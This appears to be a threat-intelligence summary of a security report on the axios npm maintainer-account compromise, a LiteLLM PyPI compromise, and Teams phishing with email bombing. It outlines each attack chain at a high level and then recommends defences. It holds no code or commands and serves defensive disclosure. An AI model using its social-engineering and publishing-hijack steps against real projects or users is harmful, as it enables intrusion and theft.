Supply Chain Compromises via Npm, PyPI Packages and Teams Phishing Campaigns

Red Canary’s April 2026 Intelligence Insights report details several prominent threats observed in March 2026. The most significant was the axios npm compromise, where attackers gained control of a lead maintainer’s account on March 30, 2026, and published two malicious versions of the axios package. This was achieved by bypassing the project’s GitHub Actions CI/CD pipeline after compromising the maintainer’s npm account and changing its associated email. These poisoned releases injected a hidden dependency, plain-crypto-js@4.2.1, which acted as a cross-platform RAT dropper targeting macOS, Windows, and Linux systems. Additionally, the report highlights the activities of the threat group TeamPCP, which compromised LiteLLM via PyPI, and a surge in Microsoft Teams phishing campaigns paired with email bombing. These campaigns leverage social engineering to trick users into installing RMM tools.

Attack Chain

1. Initial Compromise: Attackers compromise a lead maintainer’s npm account and change the associated email.
2. Pipeline Bypass: The attacker bypasses the project’s GitHub Actions CI/CD pipeline using the compromised account.
3. Malicious Package Publication: The attacker manually publishes two malicious versions of the axios package via the npm CLI.
4. Dependency Injection: The poisoned releases inject a hidden dependency called plain-crypto-js@4.2.1.
5. RAT Dropper Execution: The injected dependency executes a postinstall script, functioning as a cross-platform RAT dropper.
6. Payload Installation: The RAT dropper installs a remote access trojan (RAT) on macOS, Windows, and Linux systems.
7. Email Bombing and Teams Phishing: Victims are flooded with spam emails, followed by contact from an adversary posing as IT support via Microsoft Teams.
8. RMM Installation: The adversary guides the user into running an RMM tool like Microsoft Quick Assist, leading to potential ransomware deployment or data theft.

Impact

The axios npm compromise resulted in the potential installation of RAT payloads on macOS, Windows, and Linux systems. TeamPCP’s compromise of LiteLLM via PyPI highlights the risk of supply chain attacks leading to credential harvesting and coinmining. The increase in Microsoft Teams phishing paired with email bombing can lead to the installation of RMM tools, potentially resulting in ransomware deployment or data theft. Successful attacks may result in significant financial losses, data breaches, and reputational damage.

Recommendation

• Enable two-factor authentication (2FA) for all accounts with publishing rights to the npm package repository to mitigate impacts from npm compromises as described in the overview.
• Deploy the Sigma rule “Detect Suspicious Tar Archive Extraction” to identify potential malicious file extraction activities associated with the Microsoft Teams phishing campaigns.
• Evaluate and baseline legitimate RMM applications running in your environment, particularly Microsoft Quick Assist, as mentioned in the attack chain, to provide critical context for identifying abused tools.
• Implement a policy that all calls with IT be conducted over the approved video conferencing application, ensuring users know how to verify the caller’s identity, as mentioned in the analysis of Teams phishing campaigns.